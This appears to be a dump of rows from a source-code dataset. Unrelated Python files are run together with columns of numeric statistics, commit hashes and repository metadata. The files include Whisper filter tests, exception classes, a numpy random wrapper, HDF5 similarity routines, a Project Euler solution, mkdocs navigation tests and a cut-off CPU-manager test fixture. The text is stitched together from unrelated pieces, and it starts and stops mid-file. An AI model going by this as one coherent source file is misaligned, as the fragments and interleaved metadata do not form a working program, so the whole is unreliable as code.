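#   python manage.py extract -b ./data -d 2021-01-01 -n 2021-01-02 -l <language> -o <object_type>
#   python manage.py load -b ./data -s <target_service> -d 2021-01-01 -n 2021-01-02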
| 33.816327
| 101
| 0.602595
| 370
| 3,314
| 5.213514
| 0.183784
| 0.074132
| 0.085537
| 0.078797
| 0.782271
| 0.782271
| 0.782271
| 0.760498
| 0.760498
| 0.760498
| 0
| 0.014712
| 0.282136
| 3,314
| 97
| 102
| 34.164948
| 0.796133
| 0.0172
| 0
| 0.738636
| 0
| 0
| 0.165591
| 0
| 0
| 0
| 0
| 0.010309
| 0
| 1
| 0.034091
| false
| 0.034091
| 0.056818
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837d5c64bd96c47f04f0f162592dcb9e30cb89e4
| 1,424
|
py
|
Python
|
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
import time
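# Whisper (shh) filter tests: post two payloads on a topic and check that both
# the synchronous filter (get_new_entries) and the asynchronous watcher
# (shh_filter.watch) receive them.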
def test_shh_sync_filter(webu, skip_if_testrpc):
skip_if_testrpc(webu)
topic = webu.toHex(text="test")
shh_filter = webu.shh.filter({"topics": [topic]})
payloads = []
payloads.append(str.encode("payload1"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
payloads.append(str.encode("payload2"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
received_messages = shh_filter.get_new_entries()
assert len(received_messages) > 1
for message in received_messages:
assert message["payload"] in payloads
def test_shh_async_filter(webu, skip_if_testrpc):
skip_if_testrpc(webu)
received_messages = []
topic = webu.toHex(text="test")
shh_filter = webu.shh.filter({"topics": [topic]})
shh_filter.watch(received_messages.append)
payloads = []
payloads.append(str.encode("payload1"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
payloads.append(str.encode("payload2"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
assert len(received_messages) > 1
for message in received_messages:
assert message["payload"] in payloads
| 25.890909
| 53
| 0.630618
| 175
| 1,424
| 4.977143
| 0.211429
| 0.128588
| 0.089552
| 0.105626
| 0.851894
| 0.851894
| 0.851894
| 0.851894
| 0.851894
| 0.760046
| 0
| 0.012534
| 0.21559
| 1,424
| 54
| 54
| 26.37037
| 0.767234
| 0
| 0
| 0.863636
| 0
| 0
| 0.082865
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.045455
| false
| 0
| 0.022727
| 0
| 0.068182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8396aec6cdc039aca71f59317d7f8329e0b7d8dc
| 492
|
py
|
Python
|
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | 1
|
2016-05-09T00:28:00.000Z
|
2016-05-09T00:28:00.000Z
|
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | null | null | null |
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | null | null | null |
class SinanError(Exception):
""" A very simple exception class to use as a base
exception class for the sinan client """
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ParseError(SinanError):
""" A very simple exception class to use as a base
exception class for the sinan client """
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 22.363636
| 54
| 0.648374
| 66
| 492
| 4.590909
| 0.333333
| 0.178218
| 0.072607
| 0.132013
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0
| 0
| 0.26626
| 492
| 21
| 55
| 23.428571
| 0.839335
| 0.341463
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
839b24ac96a4c82108ad8c844c46ee4fdacc28c2
| 88
|
py
|
Python
|
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
from qiwi_handler.loader.do_request import *
from qiwi_handler.loader.converter import *
| 44
| 44
| 0.852273
| 13
| 88
| 5.538462
| 0.615385
| 0.222222
| 0.416667
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079545
| 88
| 2
| 45
| 44
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
83ae8a04e1be7a1bfda53476a34faa6b892efd35
| 276
|
py
|
Python
|
geomstats/backend/numpy_random.py
|
effigies/geomstats
|
0d6979a15cefcf98f7f92bade9d0e4abee3dde14
|
[
"MIT"
] | 1
|
2018-05-23T20:18:23.000Z
|
2018-05-23T20:18:23.000Z
|
geomstats/backend/numpy_random.py
|
leslie-chu/geomstats
|
fbed39b47b16eab4a48179106e8d0c1a5891243d
|
[
"MIT"
] | null | null | null |
geomstats/backend/numpy_random.py
|
leslie-chu/geomstats
|
fbed39b47b16eab4a48179106e8d0c1a5891243d
|
[
"MIT"
] | null | null | null |
"""Numpy based random backend."""
import numpy as np
def rand(*args, **kwargs):
return np.random.rand(*args, **kwargs)
def randint(*args, **kwargs):
return np.random.randint(*args, **kwargs)
def seed(*args, **kwargs):
return np.random.seed(*args, **kwargs)
| 17.25
| 45
| 0.648551
| 38
| 276
| 4.710526
| 0.368421
| 0.335196
| 0.268156
| 0.301676
| 0.402235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 276
| 15
| 46
| 18.4
| 0.774892
| 0.097826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
83b7da992b40ecf38f69b01a0036fdc01f402635
| 7,988
|
py
|
Python
|
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from six.moves import range
from six import iteritems
import h5py
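# Batched pairwise similarity functions (cosine, MSD, Pearson and
# Pearson-baseline) over n_x users/items. Each function walks the ratings in
# batches of `batch_size` rows, accumulates co-rating statistics, and writes
# the resulting similarity rows into an existing HDF5 dataset at
# <group_name>/<dset_name> inside `file_path`.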
def batched_cosine(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} does not exist'.format(file_path))
# Open the HDF5 dataset the similarity matrix will be written to
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sqi = np.zeros((current_batch_size, n_x), np.double)
sqj = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
prods[indice, ox] += r_x*r_ox
sqi[indice, ox] += r_x**2
sqj[indice, ox] += r_ox**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(0, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
denum = np.sqrt(sqi[indice, x_j] * sqj[indice, x_j])
num = prods[indice, x_j]
if(denum != 0):
sim[indice, x_j] = num/denum
else:
sim[indice, x_j] = 0
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_msd(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} does not exist'.format(file_path))
# Open the HDF5 dataset the similarity matrix will be written to
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
sq_diff = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
sq_diff[indice, ox] += (r_x - r_ox)**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(0, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = 1 / (sq_diff[indice, x_j] / freq[indice, x_j] + 1)
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_pearson(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} does not exist'.format(file_path))
# Open the HDF5 dataset the similarity matrix will be written to
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sqi = np.zeros((current_batch_size, n_x), np.double)
sqj = np.zeros((current_batch_size, n_x), np.double)
si = np.zeros((current_batch_size, n_x), np.double)
sj = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
prods[indice, ox] += r_x*r_ox
sqi[indice, ox] += r_x**2
sqj[indice, ox] += r_ox**2
si[indice, ox] += r_x
sj[indice, ox] += r_ox
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(x_i + 1, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
n = freq[indice, x_j]
num = n * prods[indice, x_j] - si[indice, x_j] * sj[indice, x_j]
denum = np.sqrt((n * sqi[indice, x_j] - si[indice, x_j]**2) *
(n * sqj[indice, x_j] - sj[indice, x_j]**2))
if denum == 0:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = num / denum
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_pearson_baseline(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, global_mean, x_biases, y_biases, shrinkage=100, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} does not exist'.format(file_path))
# Open the HDF5 dataset the similarity matrix will be written to
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sq_diff_i = np.zeros((current_batch_size, n_x), np.double)
sq_diff_j = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
partial_bias = global_mean + y_biases[y]
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
diff_i = (r_x - (partial_bias + x_biases[x]))
diff_j = (r_ox - (partial_bias + x_biases[ox]))
prods[indice, ox] += diff_i * diff_j
sq_diff_i[indice, ox] += diff_i**2
sq_diff_j[indice, ox] += diff_j**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(x_i + 1, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = prods[indice, x_j] / (np.sqrt(sq_diff_i[indice, x_j] *
sq_diff_j[indice, x_j]))
# the shrinkage part
sim[indice, x_j] *= (freq[indice, x_j] - 1) / (freq[indice, x_j] - 1 +
shrinkage)
if sim[indice, x_j] == -0:
sim[indice, x_j] = 0
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
| 42.26455
| 166
| 0.537682
| 1,163
| 7,988
| 3.450559
| 0.091144
| 0.081984
| 0.069773
| 0.065786
| 0.854971
| 0.850735
| 0.844256
| 0.82158
| 0.808124
| 0.791677
| 0
| 0.008975
| 0.344392
| 7,988
| 188
| 167
| 42.489362
| 0.757304
| 0.043941
| 0
| 0.746835
| 0
| 0
| 0.011536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0
| 0.031646
| 0
| 0.082278
| 0.006329
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83bb1ca143e17c7fef9e84d87f94f2d1e81cf101
| 1,282
|
py
|
Python
|
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | 1
|
2016-05-14T15:58:03.000Z
|
2016-05-14T15:58:03.000Z
|
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | null | null | null |
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
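# Project Euler, problem 8: find the greatest product of 13 adjacent digits
# in the 1000-digit number below.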
def pod(val):
prod = 1
for i in range(len(val)):
prod = prod * int(val[i])
return prod
x = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
n = 13
y = [x[i:i+n] for i in range(0, len(x), 1)]
big = 1
for i in range(len(y)):
product = pod(y[i])
if product > big:
big = product
print "Biggest: ", big
| 67.473684
| 1,006
| 0.906396
| 58
| 1,282
| 20.034483
| 0.448276
| 0.010327
| 0.015491
| 0.028399
| 0.025818
| 0.025818
| 0
| 0
| 0
| 0
| 0
| 0.826623
| 0.050702
| 1,282
| 18
| 1,007
| 71.222222
| 0.128184
| 0.012481
| 0
| 0
| 0
| 0
| 0.797628
| 0.790514
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.071429
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83ec9b7c9a3477b48326ee72edb0ec0c03ee4889
| 11,336
|
py
|
Python
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 226
|
2018-02-07T09:58:36.000Z
|
2022-03-31T16:33:54.000Z
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 55
|
2018-02-07T10:36:38.000Z
|
2022-03-16T03:23:47.000Z
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 30
|
2018-05-01T17:27:03.000Z
|
2022-03-04T07:33:28.000Z
|
from .base import NavigationTestCase
from ...meta import Meta, MetaNavItem, MetaNavRestItem
from ...navigation import NavEntryNotFound
class TestNav(NavigationTestCase):
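# Tests for the awesome-pages `nav` meta entry: explicit ordering, the "..."
# rest item (plain, glob-filtered and regex-filtered), titles, links,
# duplicates, and the error raised when a listed entry cannot be found.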
def test_all_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('3.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('3'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_some_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[
MetaNavItem('3.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('3'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_none_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[])
])
self.assertNavigationEqual(navigation.items, [])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
self.page('4'),
Meta(nav=[
MetaNavItem('3.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('3'),
self.page('2'),
self.page('4'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_empty(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_glob(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('3'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavRestItem('... | 2*.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('1')
])
def test_rest_glob_section(self):
navigation = self.createAwesomeNavigation([
self.page('a'),
self.page('b'),
self.section('Section A', [
self.page('1a', 'a/1a.md'),
self.page('1b', 'a/1b.md'),
self.page('2a', 'a/2a.md'),
self.page('2b', 'a/2b.md'),
Meta(nav=[
MetaNavRestItem('... | *b.md'),
MetaNavRestItem('...')
], path='a/.pages')
], 'a'),
Meta(nav=[
MetaNavRestItem('... | a*'),
MetaNavItem('b.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('a'),
self.section('Section A', [
self.page('1b', 'a/1b.md'),
self.page('2b', 'a/2b.md'),
self.page('1a', 'a/1a.md'),
self.page('2a', 'a/2a.md')
], 'a'),
self.page('b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_glob_precedence(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('1a'),
self.page('1b'),
self.page('2'),
self.page('2a'),
self.page('2b'),
Meta(nav=[
MetaNavRestItem('...'),
MetaNavItem('/', 'Link 1'),
MetaNavRestItem('... | 1*.md'),
MetaNavItem('/', 'Link 2'),
MetaNavRestItem('... | *[ab].md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link 1', '/'),
self.page('1'),
self.page('1a'),
self.page('1b'),
self.link('Link 2', '/'),
self.page('2a'),
self.page('2b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_regex(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('3'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavRestItem(r'... | regex=2\w*\.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('1')
])
def test_rest_regex_section(self):
navigation = self.createAwesomeNavigation([
self.page('a'),
self.page('b'),
self.section('Section A', [
self.page('1a', 'a/1a.md'),
self.page('1b', 'a/1b.md'),
self.page('2a', 'a/2a.md'),
self.page('2b', 'a/2b.md'),
Meta(nav=[
MetaNavRestItem(r'... | regex=\w*b\.md'),
MetaNavRestItem('...')
], path='a/.pages')
], 'a'),
Meta(nav=[
MetaNavRestItem(r'... | regex=a\w*'),
MetaNavItem('b.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('a'),
self.section('Section A', [
self.page('1b', 'a/1b.md'),
self.page('2b', 'a/2b.md'),
self.page('1a', 'a/1a.md'),
self.page('2a', 'a/2a.md')
], 'a'),
self.page('b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_regex_precedence(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('1a'),
self.page('1b'),
self.page('2'),
self.page('2a'),
self.page('2b'),
Meta(nav=[
MetaNavRestItem('...'),
MetaNavItem('/', 'Link 1'),
MetaNavRestItem(r'... | regex=1\w*\.md'),
MetaNavItem('/', 'Link 2'),
MetaNavRestItem(r'... | regex=\w*[ab]\.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link 1', '/'),
self.page('1'),
self.page('1a'),
self.page('1b'),
self.link('Link 2', '/'),
self.page('2a'),
self.page('2b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_title(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md', 'Title'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('Title', '2.md'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_existing_link(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.link('Link'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_existing_link_rest(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.link('Link'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_added_link(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('Url', 'Link'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link', 'Url'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_duplicate_list_item(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md'),
MetaNavItem('2.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1'),
self.page('2')
])
def test_duplicate_navigation_item(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a', '2.md'),
self.page('2b', '2.md'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2b', '2.md'),
self.page('1')
])
def test_not_found(self):
with self.assertRaises(NavEntryNotFound):
self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavItem('3.md')
])
])
def test_not_found_not_strict(self):
with self.assertWarns(NavEntryNotFound):
self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavItem('3.md')
])
], strict=False)
| 29.91029
| 61
| 0.447159
| 992
| 11,336
| 5.051411
| 0.063508
| 0.191579
| 0.05927
| 0.077829
| 0.924566
| 0.888046
| 0.88645
| 0.88645
| 0.874277
| 0.857513
| 0
| 0.025116
| 0.392378
| 11,336
| 378
| 62
| 29.989418
| 0.702381
| 0
| 0
| 0.867647
| 0
| 0
| 0.065367
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.055882
| false
| 0
| 0.008824
| 0
| 0.067647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3ac3def2bea175a12f11df987353c0275b9c305
| 11,093
|
py
|
Python
|
tests/unit/test_isolate.py
|
GitSoftwareNow/CPU-Manager-for-Kubernetes
|
46988af8a5c005abeb6f68162035b7be632f76c9
|
[
"Apache-2.0"
] | 1
|
2019-04-25T23:25:45.000Z
|
2019-04-25T23:25:45.000Z
|
tests/unit/test_isolate.py
|
GitSoftwareNow/CPU-Manager-for-Kubernetes
|
46988af8a5c005abeb6f68162035b7be632f76c9
|
[
"Apache-2.0"
] | 1
|
2021-02-24T01:11:52.000Z
|
2021-02-24T01:11:52.000Z
|
tests/unit/test_isolate.py
|
isabella232/CPU-Manager-for-Kubernetes
|
b92d994fedc734898f9852bb65fcd4cd2be55384
|
[
"Apache-2.0"
] | null | null | null |
from intel import isolate, config
from unittest.mock import patch, MagicMock
import pytest
import os
EXCL_ONE = [
{
"pool": "exclusive",
"socket": "0",
"cl": "0,11",
"tasks": ["123"]
}
]
SHAR_ONE = [
{
"pool": "shared",
"socket": "0",
"cl": "4,15,5,16",
"tasks": ["123"]
}
]
INF_ONE = [
{
"pool": "infra",
"socket": "0",
"cl": "6,17,7,18,8,19",
"tasks": ["123"]
}
]
EXNI_ONE = [
{
"pool": "exclusive-non-isolcpus",
"socket": "0",
"cl": "9,20",
"tasks": ["123"]
}
]
FAKE_CONFIG = {
"exclusive": {
"0": {
"0,11": [],
"1,12": [],
"2,13": []
},
"1": {
"3,14": []
}
},
"shared": {
"0": {
"4,15,5,16": []
},
"1": {}
},
"infra": {
